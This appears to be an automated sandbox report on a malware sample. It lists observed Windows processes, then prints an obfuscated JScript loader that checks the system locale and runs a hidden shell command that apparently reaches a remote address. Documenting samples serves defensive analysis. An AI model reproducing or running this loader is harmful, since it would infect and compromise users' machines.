Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff701410000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 13 |
Start time: | 17:38:51 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 14 |
Start time: | 17:38:51 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4ee0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 16 |
Start time: | 17:38:51 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function eqsafqfv() { |
|
1 | jfaros = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var yedfi = this[eyoylqh + ehcaqs + wxtghaad + prhasytue + buhhn + ghfxntfr + xteppil + hnfozjg] ( this[ncsmxpuye + etxppesu + kirkkl + wxtghaad + jdxbzdmde + eyoylqh + hnfozjg][ycwaylt + wxtghaad + buhhn + ehcaqs + hnfozjg + buhhn + qwksvxx + duwevcsno + yizus + buhhn + kirkkl + hnfozjg] ( ncsmxpuye + etxppesu + kirkkl + wxtghaad + jdxbzdmde + eyoylqh + hnfozjg + yztbu + etxppesu + zfjsljz + buhhn + mhetucit + mhetucit ) [xzraruzfc + buhhn + svdjdmt + xzraruzfc + buhhn + ehcaqs + ehhdnkr] ( ygjrdne + bnnqtsf + qbsevz + dyzvb + clkdjzr + ycwaylt + ymshiu + xzraruzfc + xzraruzfc + qbsevz + gamqh + censst + clkdjzr + ymshiu + etxppesu + qbsevz + xzraruzfc + aeloskpvj + ycwaylt + xlcdteytn + xteppil + hnfozjg + wxtghaad + xlcdteytn + mhetucit + avinivqth + iiyvihxoo + ehcaqs + xteppil + buhhn + mhetucit + aeloskpvj + ghfxntfr + xteppil + hnfozjg + buhhn + wxtghaad + xteppil + ehcaqs + hnfozjg + jdxbzdmde + xlcdteytn + xteppil + ehcaqs + mhetucit + aeloskpvj + futjuyv + xlcdteytn + kirkkl + ehcaqs + mhetucit + buhhn ), 16 ); |
|
3 | for ( ayrbhouyz = 0 ; ayrbhouyz < jfaros[mhetucit + buhhn + xteppil + svdjdmt + hnfozjg + zfjsljz] ; ++ ayrbhouyz ) | |
4 | { | |
5 | if ( yedfi == jfaros[ayrbhouyz] ) | |
6 | { | |
7 | yedfi = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( yedfi !== true ) | |
12 | this[ncsmxpuye + etxppesu + kirkkl + wxtghaad + jdxbzdmde + eyoylqh + hnfozjg][nrcbvmjxi + yqwjnf + jdxbzdmde + hnfozjg] ( ); | |
13 | this[ncsmxpuye + etxppesu + kirkkl + wxtghaad + jdxbzdmde + eyoylqh + hnfozjg][ycwaylt + wxtghaad + buhhn + ehcaqs + hnfozjg + buhhn + qwksvxx + duwevcsno + yizus + buhhn + kirkkl + hnfozjg] ( ncsmxpuye + etxppesu + kirkkl + wxtghaad + jdxbzdmde + eyoylqh + hnfozjg + yztbu + etxppesu + zfjsljz + buhhn + mhetucit + mhetucit ) [wxtghaad + yqwjnf + xteppil] ( kirkkl + jvkafly + ehhdnkr + avinivqth + ndzlnjcyq + kirkkl + avinivqth + eyoylqh + xlcdteytn + jsuyzo + buhhn + wxtghaad + prhasytue + zfjsljz + buhhn + mhetucit + mhetucit + yztbu + buhhn + zrupp + buhhn + avinivqth + vhmxkskl + ycwaylt + xlcdteytn + jvkafly + jvkafly + ehcaqs + xteppil + ehhdnkr + avinivqth + rarukq + ghfxntfr + xteppil + wbmop + xlcdteytn + yyfshldb + buhhn + vhmxkskl + ncsmxpuye + buhhn + duwevcsno + xzraruzfc + buhhn + ahtcsqf + yqwjnf + buhhn + prhasytue + hnfozjg + avinivqth + vhmxkskl + qwksvxx + yqwjnf + hnfozjg + euvrr + jdxbzdmde + mhetucit + buhhn + avinivqth + yuuju + hnfozjg + buhhn + jvkafly + eyoylqh + yuuju + aeloskpvj + jdxbzdmde + xteppil + wbmop + xlcdteytn + jdxbzdmde + kirkkl + buhhn + yztbu + eyoylqh + ehhdnkr + gjfksp + avinivqth + zfjsljz + hnfozjg + hnfozjg + eyoylqh + jerdembqj + ndzlnjcyq + ndzlnjcyq + sjhppq + dlouhoq + kemvuzuqh + yztbu + sjhppq + rookxhjso + kemvuzuqh + yztbu + sjhppq + yztbu + ekgbm + jaehvb + dnooyhhbz + ndzlnjcyq + jdxbzdmde + xteppil + wbmop + xlcdteytn + jdxbzdmde + kirkkl + buhhn + yztbu + eyoylqh + zfjsljz + eyoylqh + rarukq + ksiue + ksiue + prhasytue + hnfozjg + ehcaqs + wxtghaad + hnfozjg + avinivqth + yuuju + hnfozjg + buhhn + jvkafly + eyoylqh + yuuju + aeloskpvj + jdxbzdmde + xteppil + wbmop + xlcdteytn + jdxbzdmde + kirkkl + buhhn + yztbu + eyoylqh + ehhdnkr + gjfksp + ksiue + ksiue + kirkkl + jvkafly + ehhdnkr + avinivqth + ndzlnjcyq + kirkkl + avinivqth + xteppil + buhhn + hnfozjg + avinivqth + yqwjnf + prhasytue + buhhn + avinivqth + aeloskpvj + aeloskpvj + sjhppq + dlouhoq + kemvuzuqh + yztbu + sjhppq + rookxhjso + kemvuzuqh + yztbu + sjhppq + yztbu + ekgbm + jaehvb + dnooyhhbz + ttuwohpxg + urbvq + urbvq + urbvq + urbvq + aeloskpvj + ehhdnkr + ehcaqs + wbmop + jsuyzo + jsuyzo + jsuyzo + wxtghaad + xlcdteytn + xlcdteytn + hnfozjg + aeloskpvj + ksiue + ksiue + kirkkl + jvkafly + ehhdnkr + avinivqth + ndzlnjcyq + kirkkl + avinivqth + wxtghaad + buhhn + svdjdmt + prhasytue + wbmop + wxtghaad + kemvuzuqh + ekgbm + avinivqth + ndzlnjcyq + prhasytue + avinivqth + aeloskpvj + aeloskpvj + sjhppq + dlouhoq + kemvuzuqh + yztbu + sjhppq + rookxhjso + kemvuzuqh + yztbu + sjhppq + yztbu + ekgbm + jaehvb + dnooyhhbz + ttuwohpxg + urbvq + urbvq + urbvq + urbvq + aeloskpvj + ehhdnkr + ehcaqs + wbmop + jsuyzo + jsuyzo + jsuyzo + wxtghaad + xlcdteytn + xlcdteytn + hnfozjg + aeloskpvj + sjhppq + ekgbm + dnooyhhbz + rookxhjso + dnooyhhbz + ekgbm + dtshhhyih + ekgbm + urbvq + jaehvb + rookxhjso + dlouhoq + gtorftl + dnooyhhbz + yztbu + ehhdnkr + mhetucit + mhetucit, 0, false ); |
|
14 | } | |
15 | ahtcsqf = "i"; | |
16 | ahtcsqf = "n"; | |
17 | ahtcsqf = "F"; | |
18 | ahtcsqf = "Q"; | |
19 | ahtcsqf = "J"; | |
20 | ahtcsqf = "z"; | |
21 | ahtcsqf = "X"; | |
22 | ahtcsqf = "v"; | |
23 | ahtcsqf = "E"; | |
24 | ahtcsqf = "v"; | |
25 | ahtcsqf = "w"; | |
26 | ahtcsqf = "E"; | |
27 | ahtcsqf = "G"; | |
28 | ahtcsqf = "z"; | |
29 | ahtcsqf = "B"; | |
30 | ahtcsqf = "t"; | |
31 | ahtcsqf = "t"; | |
32 | ahtcsqf = "l"; | |
33 | ahtcsqf = "Z"; | |
34 | ahtcsqf = "H"; | |
35 | ahtcsqf = "B"; | |
36 | ahtcsqf = "v"; | |
37 | ahtcsqf = "S"; | |
38 | ahtcsqf = "N"; | |
39 | ahtcsqf = "c"; | |
40 | ahtcsqf = "j"; | |
41 | ahtcsqf = "d"; | |
42 | ahtcsqf = "o"; | |
43 | ahtcsqf = "n"; | |
44 | ahtcsqf = "q"; | |
45 | xlcdteytn = "y"; | |
46 | xlcdteytn = "I"; | |
47 | xlcdteytn = "T"; | |
48 | xlcdteytn = "y"; | |
49 | xlcdteytn = "A"; | |
50 | xlcdteytn = "s"; | |
51 | xlcdteytn = "w"; | |
52 | xlcdteytn = "z"; | |
53 | xlcdteytn = "W"; | |
54 | xlcdteytn = "X"; | |
55 | xlcdteytn = "R"; | |
56 | xlcdteytn = "Y"; | |
57 | xlcdteytn = "n"; | |
58 | xlcdteytn = "I"; | |
59 | xlcdteytn = "i"; | |
60 | xlcdteytn = "n"; | |
61 | xlcdteytn = "A"; | |
62 | xlcdteytn = "g"; | |
63 | xlcdteytn = "T"; | |
64 | xlcdteytn = "Y"; | |
65 | xlcdteytn = "C"; | |
66 | xlcdteytn = "w"; | |
67 | xlcdteytn = "r"; | |
68 | xlcdteytn = "R"; | |
69 | xlcdteytn = "Z"; | |
70 | xlcdteytn = "V"; | |
71 | xlcdteytn = "v"; | |
72 | xlcdteytn = "T"; | |
73 | xlcdteytn = "N"; | |
74 | xlcdteytn = "Y"; | |
75 | xlcdteytn = "o"; | |
76 | xlcdteytn = "F"; | |
77 | xlcdteytn = "y"; | |
78 | xlcdteytn = "E"; | |
79 | xlcdteytn = "T"; | |
80 | xlcdteytn = "d"; | |
81 | xlcdteytn = "p"; | |
82 | xlcdteytn = "N"; | |
83 | xlcdteytn = "o"; | |
84 | prhasytue = "B"; | |
85 | prhasytue = "i"; | |
86 | prhasytue = "D"; | |
87 | prhasytue = "d"; | |
88 | prhasytue = "r"; | |
89 | prhasytue = "p"; | |
90 | prhasytue = "j"; | |
91 | prhasytue = "Y"; | |
92 | prhasytue = "g"; | |
93 | prhasytue = "x"; | |
94 | prhasytue = "b"; | |
95 | prhasytue = "a"; | |
96 | prhasytue = "l"; | |
97 | prhasytue = "X"; | |
98 | prhasytue = "L"; | |
99 | prhasytue = "r"; | |
100 | prhasytue = "b"; | |
101 | prhasytue = "X"; | |
102 | prhasytue = "u"; | |
103 | prhasytue = "r"; | |
104 | prhasytue = "Z"; | |
105 | prhasytue = "o"; | |
106 | prhasytue = "L"; | |
107 | prhasytue = "R"; | |
108 | prhasytue = "L"; | |
109 | prhasytue = "O"; | |
110 | prhasytue = "V"; | |
111 | prhasytue = "t"; | |
112 | prhasytue = "C"; | |
113 | prhasytue = "Q"; | |
114 | prhasytue = "M"; | |
115 | prhasytue = "o"; | |
116 | prhasytue = "H"; | |
117 | prhasytue = "t"; | |
118 | prhasytue = "s"; | |
119 | nrcbvmjxi = "l"; | |
120 | nrcbvmjxi = "L"; | |
121 | nrcbvmjxi = "q"; | |
122 | nrcbvmjxi = "D"; | |
123 | nrcbvmjxi = "I"; | |
124 | nrcbvmjxi = "r"; | |
125 | nrcbvmjxi = "t"; | |
126 | nrcbvmjxi = "Q"; | |
127 | nrcbvmjxi = "P"; | |
128 | nrcbvmjxi = "G"; | |
129 | nrcbvmjxi = "A"; | |
130 | nrcbvmjxi = "f"; | |
131 | nrcbvmjxi = "p"; | |
132 | nrcbvmjxi = "i"; | |
133 | nrcbvmjxi = "Z"; | |
134 | nrcbvmjxi = "g"; | |
135 | nrcbvmjxi = "P"; | |
136 | nrcbvmjxi = "M"; | |
137 | nrcbvmjxi = "e"; | |
138 | nrcbvmjxi = "u"; | |
139 | nrcbvmjxi = "d"; | |
140 | nrcbvmjxi = "g"; | |
141 | nrcbvmjxi = "A"; | |
142 | nrcbvmjxi = "N"; | |
143 | nrcbvmjxi = "a"; | |
144 | nrcbvmjxi = "u"; | |
145 | nrcbvmjxi = "M"; | |
146 | nrcbvmjxi = "W"; | |
147 | nrcbvmjxi = "d"; | |
148 | nrcbvmjxi = "C"; | |
149 | nrcbvmjxi = "t"; | |
150 | nrcbvmjxi = "R"; | |
151 | nrcbvmjxi = "b"; | |
152 | nrcbvmjxi = "p"; | |
153 | nrcbvmjxi = "E"; | |
154 | nrcbvmjxi = "L"; | |
155 | nrcbvmjxi = "D"; | |
156 | nrcbvmjxi = "D"; | |
157 | nrcbvmjxi = "q"; | |
158 | nrcbvmjxi = "Q"; | |
159 | zfjsljz = "c"; | |
160 | zfjsljz = "W"; | |
161 | zfjsljz = "T"; | |
162 | zfjsljz = "V"; | |
163 | zfjsljz = "t"; | |
164 | zfjsljz = "g"; | |
165 | zfjsljz = "Z"; | |
166 | zfjsljz = "T"; | |
167 | zfjsljz = "h"; | |
168 | clkdjzr = "h"; | |
169 | clkdjzr = "i"; | |
170 | clkdjzr = "F"; | |
171 | clkdjzr = "u"; | |
172 | clkdjzr = "Z"; | |
173 | clkdjzr = "b"; | |
174 | clkdjzr = "C"; | |
175 | clkdjzr = "Q"; | |
176 | clkdjzr = "e"; | |
177 | clkdjzr = "j"; | |
178 | clkdjzr = "s"; | |
179 | clkdjzr = "e"; | |
180 | clkdjzr = "N"; | |
181 | clkdjzr = "T"; | |
182 | clkdjzr = "q"; | |
183 | clkdjzr = "g"; | |
184 | clkdjzr = "m"; | |
185 | clkdjzr = "T"; | |
186 | clkdjzr = "a"; | |
187 | clkdjzr = "j"; | |
188 | clkdjzr = "f"; | |
189 | clkdjzr = "J"; | |
190 | clkdjzr = "Z"; | |
191 | clkdjzr = "G"; | |
192 | clkdjzr = "t"; | |
193 | clkdjzr = "_"; | |
194 | sjhppq = "r"; | |
195 | sjhppq = "P"; | |
196 | sjhppq = "H"; | |
197 | sjhppq = "J"; | |
198 | sjhppq = "w"; | |
199 | sjhppq = "h"; | |
200 | sjhppq = "e"; | |
201 | sjhppq = "W"; | |
202 | sjhppq = "n"; | |
203 | sjhppq = "q"; | |
204 | sjhppq = "R"; | |
205 | sjhppq = "d"; | |
206 | sjhppq = "M"; | |
207 | sjhppq = "i"; | |
208 | sjhppq = "X"; | |
209 | sjhppq = "i"; | |
210 | sjhppq = "y"; | |
211 | sjhppq = "l"; | |
212 | sjhppq = "c"; | |
213 | sjhppq = "P"; | |
214 | sjhppq = "m"; | |
215 | sjhppq = "d"; | |
216 | sjhppq = "y"; | |
217 | sjhppq = "t"; | |
218 | sjhppq = "y"; | |
219 | sjhppq = "Z"; | |
220 | sjhppq = "P"; | |
221 | sjhppq = "B"; | |
222 | sjhppq = "o"; | |
223 | sjhppq = "a"; | |
224 | sjhppq = "n"; | |
225 | sjhppq = "B"; | |
226 | sjhppq = "w"; | |
227 | sjhppq = "n"; | |
228 | sjhppq = "W"; | |
229 | sjhppq = "e"; | |
230 | sjhppq = "b"; | |
231 | sjhppq = "R"; | |
232 | sjhppq = "1"; | |
233 | jvkafly = "o"; | |
234 | jvkafly = "l"; | |
235 | jvkafly = "u"; | |
236 | jvkafly = "I"; | |
237 | jvkafly = "L"; | |
238 | jvkafly = "l"; | |
239 | jvkafly = "L"; | |
240 | jvkafly = "Q"; | |
241 | jvkafly = "n"; | |
242 | jvkafly = "x"; | |
243 | jvkafly = "g"; | |
244 | jvkafly = "Y"; | |
245 | jvkafly = "c"; | |
246 | jvkafly = "P"; | |
247 | jvkafly = "W"; | |
248 | jvkafly = "l"; | |
249 | jvkafly = "L"; | |
250 | jvkafly = "x"; | |
251 | jvkafly = "z"; | |
252 | jvkafly = "C"; | |
253 | jvkafly = "w"; | |
254 | jvkafly = "f"; | |
255 | jvkafly = "G"; | |
256 | jvkafly = "y"; | |
257 | jvkafly = "g"; | |
258 | jvkafly = "I"; | |
259 | jvkafly = "a"; | |
260 | jvkafly = "E"; | |
261 | jvkafly = "s"; | |
262 | jvkafly = "N"; | |
263 | jvkafly = "i"; | |
264 | jvkafly = "E"; | |
265 | jvkafly = "D"; | |
266 | jvkafly = "g"; | |
267 | jvkafly = "t"; | |
268 | jvkafly = "C"; | |
269 | jvkafly = "d"; | |
270 | jvkafly = "p"; | |
271 | jvkafly = "j"; | |
272 | jvkafly = "M"; | |
273 | jvkafly = "m"; | |
274 | jvkafly = "I"; | |
275 | jvkafly = "t"; | |
276 | jvkafly = "l"; | |
277 | jvkafly = "m"; | |
278 | wxtghaad = "Y"; | |
279 | wxtghaad = "q"; | |
280 | wxtghaad = "r"; | |
281 | yztbu = "z"; | |
282 | yztbu = "V"; | |
283 | yztbu = "L"; | |
284 | yztbu = "z"; | |
285 | yztbu = "P"; | |
286 | yztbu = "W"; | |
287 | yztbu = "b"; | |
288 | yztbu = "V"; | |
289 | yztbu = "H"; | |
290 | yztbu = "W"; | |
291 | yztbu = "x"; | |
292 | yztbu = "w"; | |
293 | yztbu = "w"; | |
294 | yztbu = "w"; | |
295 | yztbu = "W"; | |
296 | yztbu = "u"; | |
297 | yztbu = "V"; | |
298 | yztbu = "C"; | |
299 | yztbu = "C"; | |
300 | yztbu = "n"; | |
301 | yztbu = "q"; | |
302 | yztbu = "J"; | |
303 | yztbu = "g"; | |
304 | yztbu = "."; | |
305 | qbsevz = "Z"; | |
306 | qbsevz = "C"; | |
307 | qbsevz = "G"; | |
308 | qbsevz = "c"; | |
309 | qbsevz = "O"; | |
310 | qbsevz = "o"; | |
311 | qbsevz = "t"; | |
312 | qbsevz = "p"; | |
313 | qbsevz = "h"; | |
314 | qbsevz = "s"; | |
315 | qbsevz = "Y"; | |
316 | qbsevz = "q"; | |
317 | qbsevz = "b"; | |
318 | qbsevz = "E"; | |
319 | qbsevz = "j"; | |
320 | qbsevz = "g"; | |
321 | qbsevz = "L"; | |
322 | qbsevz = "O"; | |
323 | qbsevz = "N"; | |
324 | qbsevz = "g"; | |
325 | qbsevz = "G"; | |
326 | qbsevz = "d"; | |
327 | qbsevz = "m"; | |
328 | qbsevz = "z"; | |
329 | qbsevz = "x"; | |
330 | qbsevz = "Q"; | |
331 | qbsevz = "d"; | |
332 | qbsevz = "G"; | |
333 | qbsevz = "S"; | |
334 | qbsevz = "z"; | |
335 | qbsevz = "c"; | |
336 | qbsevz = "V"; | |
337 | qbsevz = "U"; | |
338 | qbsevz = "O"; | |
339 | qbsevz = "J"; | |
340 | qbsevz = "P"; | |
341 | qbsevz = "A"; | |
342 | qbsevz = "E"; | |
343 | ygjrdne = "j"; | |
344 | ygjrdne = "x"; | |
345 | ygjrdne = "u"; | |
346 | ygjrdne = "e"; | |
347 | ygjrdne = "v"; | |
348 | ygjrdne = "i"; | |
349 | ygjrdne = "g"; | |
350 | ygjrdne = "Q"; | |
351 | ygjrdne = "A"; | |
352 | ygjrdne = "G"; | |
353 | ygjrdne = "L"; | |
354 | ygjrdne = "Q"; | |
355 | ygjrdne = "a"; | |
356 | ygjrdne = "D"; | |
357 | ygjrdne = "y"; | |
358 | ygjrdne = "t"; | |
359 | ygjrdne = "E"; | |
360 | ygjrdne = "r"; | |
361 | ygjrdne = "n"; | |
362 | ygjrdne = "o"; | |
363 | ygjrdne = "o"; | |
364 | ygjrdne = "S"; | |
365 | ygjrdne = "k"; | |
366 | ygjrdne = "K"; | |
367 | ygjrdne = "n"; | |
368 | ygjrdne = "k"; | |
369 | ygjrdne = "h"; | |
370 | ygjrdne = "V"; | |
371 | ygjrdne = "j"; | |
372 | ygjrdne = "t"; | |
373 | ygjrdne = "G"; | |
374 | ygjrdne = "O"; | |
375 | ygjrdne = "k"; | |
376 | ygjrdne = "D"; | |
377 | ygjrdne = "c"; | |
378 | ygjrdne = "Q"; | |
379 | ygjrdne = "s"; | |
380 | ygjrdne = "E"; | |
381 | ygjrdne = "f"; | |
382 | ygjrdne = "H"; | |
383 | vhmxkskl = "O"; | |
384 | vhmxkskl = "J"; | |
385 | vhmxkskl = "p"; | |
386 | vhmxkskl = "s"; | |
387 | vhmxkskl = "T"; | |
388 | vhmxkskl = "l"; | |
389 | vhmxkskl = "q"; | |
390 | vhmxkskl = "v"; | |
391 | vhmxkskl = "c"; | |
392 | vhmxkskl = "z"; | |
393 | vhmxkskl = "t"; | |
394 | vhmxkskl = "V"; | |
395 | vhmxkskl = "g"; | |
396 | vhmxkskl = "A"; | |
397 | vhmxkskl = "Q"; | |
398 | vhmxkskl = "P"; | |
399 | vhmxkskl = "f"; | |
400 | vhmxkskl = "n"; | |
401 | vhmxkskl = "a"; | |
402 | vhmxkskl = "S"; | |
403 | vhmxkskl = "K"; | |
404 | vhmxkskl = "U"; | |
405 | vhmxkskl = "-"; | |
406 | kirkkl = "A"; | |
407 | kirkkl = "G"; | |
408 | kirkkl = "Z"; | |
409 | kirkkl = "F"; | |
410 | kirkkl = "y"; | |
411 | kirkkl = "i"; | |
412 | kirkkl = "H"; | |
413 | kirkkl = "a"; | |
414 | kirkkl = "Z"; | |
415 | kirkkl = "J"; | |
416 | kirkkl = "P"; | |
417 | kirkkl = "c"; | |
418 | kirkkl = "A"; | |
419 | kirkkl = "w"; | |
420 | kirkkl = "g"; | |
421 | kirkkl = "f"; | |
422 | kirkkl = "U"; | |
423 | kirkkl = "R"; | |
424 | kirkkl = "B"; | |
425 | kirkkl = "X"; | |
426 | kirkkl = "v"; | |
427 | kirkkl = "m"; | |
428 | kirkkl = "c"; | |
429 | kirkkl = "v"; | |
430 | kirkkl = "Y"; | |
431 | kirkkl = "n"; | |
432 | kirkkl = "Q"; | |
433 | kirkkl = "D"; | |
434 | kirkkl = "c"; | |
435 | qwksvxx = "I"; | |
436 | qwksvxx = "m"; | |
437 | qwksvxx = "i"; | |
438 | qwksvxx = "c"; | |
439 | qwksvxx = "F"; | |
440 | qwksvxx = "Q"; | |
441 | qwksvxx = "O"; | |
442 | ycwaylt = "l"; | |
443 | ycwaylt = "c"; | |
444 | ycwaylt = "J"; | |
445 | ycwaylt = "q"; | |
446 | ycwaylt = "Q"; | |
447 | ycwaylt = "T"; | |
448 | ycwaylt = "y"; | |
449 | ycwaylt = "D"; | |
450 | ycwaylt = "X"; | |
451 | ycwaylt = "v"; | |
452 | ycwaylt = "k"; | |
453 | ycwaylt = "V"; | |
454 | ycwaylt = "t"; | |
455 | ycwaylt = "S"; | |
456 | ycwaylt = "Y"; | |
457 | ycwaylt = "f"; | |
458 | ycwaylt = "k"; | |
459 | ycwaylt = "f"; | |
460 | ycwaylt = "Q"; | |
461 | ycwaylt = "D"; | |
462 | ycwaylt = "f"; | |
463 | ycwaylt = "o"; | |
464 | ycwaylt = "C"; | |
465 | hnfozjg = "O"; | |
466 | hnfozjg = "e"; | |
467 | hnfozjg = "a"; | |
468 | hnfozjg = "L"; | |
469 | hnfozjg = "f"; | |
470 | hnfozjg = "M"; | |
471 | hnfozjg = "k"; | |
472 | hnfozjg = "t"; | |
473 | mhetucit = "v"; | |
474 | mhetucit = "h"; | |
475 | mhetucit = "p"; | |
476 | mhetucit = "S"; | |
477 | mhetucit = "F"; | |
478 | mhetucit = "U"; | |
479 | mhetucit = "g"; | |
480 | mhetucit = "a"; | |
481 | mhetucit = "H"; | |
482 | mhetucit = "h"; | |
483 | mhetucit = "i"; | |
484 | mhetucit = "d"; | |
485 | mhetucit = "l"; | |
486 | censst = "T"; | |
487 | censst = "J"; | |
488 | censst = "T"; | |
489 | censst = "q"; | |
490 | censst = "a"; | |
491 | censst = "l"; | |
492 | censst = "S"; | |
493 | censst = "G"; | |
494 | censst = "S"; | |
495 | censst = "r"; | |
496 | censst = "j"; | |
497 | censst = "S"; | |
498 | censst = "U"; | |
499 | censst = "G"; | |
500 | censst = "r"; | |
501 | censst = "Z"; | |
502 | censst = "v"; | |
503 | censst = "V"; | |
504 | censst = "T"; | |
505 | censst = "T"; | |
506 | censst = "w"; | |
507 | censst = "V"; | |
508 | censst = "S"; | |
509 | censst = "p"; | |
510 | censst = "h"; | |
511 | censst = "A"; | |
512 | censst = "E"; | |
513 | censst = "e"; | |
514 | censst = "F"; | |
515 | censst = "X"; | |
516 | censst = "b"; | |
517 | censst = "C"; | |
518 | censst = "o"; | |
519 | censst = "R"; | |
520 | censst = "y"; | |
521 | censst = "T"; | |
522 | censst = "l"; | |
523 | censst = "h"; | |
524 | censst = "h"; | |
525 | censst = "Z"; | |
526 | censst = "k"; | |
527 | censst = "x"; | |
528 | censst = "a"; | |
529 | censst = "r"; | |
530 | censst = "T"; | |
531 | ekgbm = "J"; | |
532 | ekgbm = "h"; | |
533 | ekgbm = "e"; | |
534 | ekgbm = "a"; | |
535 | ekgbm = "2"; | |
536 | jerdembqj = ":"; | |
537 | duwevcsno = "v"; | |
538 | duwevcsno = "U"; | |
539 | duwevcsno = "W"; | |
540 | duwevcsno = "I"; | |
541 | duwevcsno = "o"; | |
542 | duwevcsno = "I"; | |
543 | duwevcsno = "U"; | |
544 | duwevcsno = "J"; | |
545 | duwevcsno = "F"; | |
546 | duwevcsno = "M"; | |
547 | duwevcsno = "n"; | |
548 | duwevcsno = "b"; | |
549 | yuuju = "i"; | |
550 | yuuju = "z"; | |
551 | yuuju = "H"; | |
552 | yuuju = "K"; | |
553 | yuuju = "s"; | |
554 | yuuju = "e"; | |
555 | yuuju = "O"; | |
556 | yuuju = "N"; | |
557 | yuuju = "p"; | |
558 | yuuju = "%"; | |
559 | zrupp = "H"; | |
560 | zrupp = "Y"; | |
561 | zrupp = "z"; | |
562 | zrupp = "P"; | |
563 | zrupp = "i"; | |
564 | zrupp = "X"; | |
565 | zrupp = "a"; | |
566 | zrupp = "n"; | |
567 | zrupp = "V"; | |
568 | zrupp = "v"; | |
569 | zrupp = "d"; | |
570 | zrupp = "u"; | |
571 | zrupp = "U"; | |
572 | zrupp = "C"; | |
573 | zrupp = "L"; | |
574 | zrupp = "B"; | |
575 | zrupp = "s"; | |
576 | zrupp = "N"; | |
577 | zrupp = "h"; | |
578 | zrupp = "V"; | |
579 | zrupp = "B"; | |
580 | zrupp = "H"; | |
581 | zrupp = "B"; | |
582 | zrupp = "G"; | |
583 | zrupp = "s"; | |
584 | zrupp = "X"; | |
585 | zrupp = "b"; | |
586 | zrupp = "t"; | |
587 | zrupp = "o"; | |
588 | zrupp = "H"; | |
589 | zrupp = "k"; | |
590 | zrupp = "d"; | |
591 | zrupp = "G"; | |
592 | zrupp = "p"; | |
593 | zrupp = "k"; | |
594 | zrupp = "r"; | |
595 | zrupp = "E"; | |
596 | zrupp = "C"; | |
597 | zrupp = "K"; | |
598 | zrupp = "G"; | |
599 | zrupp = "C"; | |
600 | zrupp = "x"; | |
601 | zrupp = "F"; | |
602 | zrupp = "s"; | |
603 | zrupp = "x"; | |
604 | jsuyzo = "p"; | |
605 | jsuyzo = "P"; | |
606 | jsuyzo = "S"; | |
607 | jsuyzo = "v"; | |
608 | jsuyzo = "e"; | |
609 | jsuyzo = "m"; | |
610 | jsuyzo = "E"; | |
611 | jsuyzo = "t"; | |
612 | jsuyzo = "j"; | |
613 | jsuyzo = "g"; | |
614 | jsuyzo = "m"; | |
615 | jsuyzo = "y"; | |
616 | jsuyzo = "N"; | |
617 | jsuyzo = "w"; | |
618 | gjfksp = "T"; | |
619 | gjfksp = "t"; | |
620 | gjfksp = "f"; | |
621 | gjfksp = "X"; | |
622 | gjfksp = "o"; | |
623 | gjfksp = "e"; | |
624 | gjfksp = "m"; | |
625 | gjfksp = "g"; | |
626 | gjfksp = "A"; | |
627 | gjfksp = "r"; | |
628 | gjfksp = "c"; | |
629 | gjfksp = "y"; | |
630 | gjfksp = "a"; | |
631 | gjfksp = "A"; | |
632 | gjfksp = "j"; | |
633 | gjfksp = "R"; | |
634 | gjfksp = "C"; | |
635 | gjfksp = "I"; | |
636 | gjfksp = "Q"; | |
637 | gjfksp = "U"; | |
638 | gjfksp = "y"; | |
639 | gjfksp = "F"; | |
640 | gjfksp = "W"; | |
641 | gjfksp = "I"; | |
642 | gjfksp = "H"; | |
643 | gjfksp = "D"; | |
644 | gjfksp = "y"; | |
645 | gjfksp = "A"; | |
646 | gjfksp = "a"; | |
647 | gjfksp = "r"; | |
648 | gjfksp = "J"; | |
649 | gjfksp = "R"; | |
650 | gjfksp = "r"; | |
651 | gjfksp = "D"; | |
652 | gjfksp = "k"; | |
653 | gjfksp = "c"; | |
654 | gjfksp = "a"; | |
655 | gjfksp = "C"; | |
656 | gjfksp = "D"; | |
657 | gjfksp = "e"; | |
658 | gjfksp = "z"; | |
659 | gjfksp = "Q"; | |
660 | gjfksp = "f"; | |
661 | kemvuzuqh = "H"; | |
662 | kemvuzuqh = "Y"; | |
663 | kemvuzuqh = "R"; | |
664 | kemvuzuqh = "a"; | |
665 | kemvuzuqh = "d"; | |
666 | kemvuzuqh = "j"; | |
667 | kemvuzuqh = "m"; | |
668 | kemvuzuqh = "f"; | |
669 | kemvuzuqh = "b"; | |
670 | kemvuzuqh = "l"; | |
671 | kemvuzuqh = "q"; | |
672 | kemvuzuqh = "c"; | |
673 | kemvuzuqh = "M"; | |
674 | kemvuzuqh = "u"; | |
675 | kemvuzuqh = "C"; | |
676 | kemvuzuqh = "A"; | |
677 | kemvuzuqh = "K"; | |
678 | kemvuzuqh = "a"; | |
679 | kemvuzuqh = "O"; | |
680 | kemvuzuqh = "J"; | |
681 | kemvuzuqh = "H"; | |
682 | kemvuzuqh = "n"; | |
683 | kemvuzuqh = "I"; | |
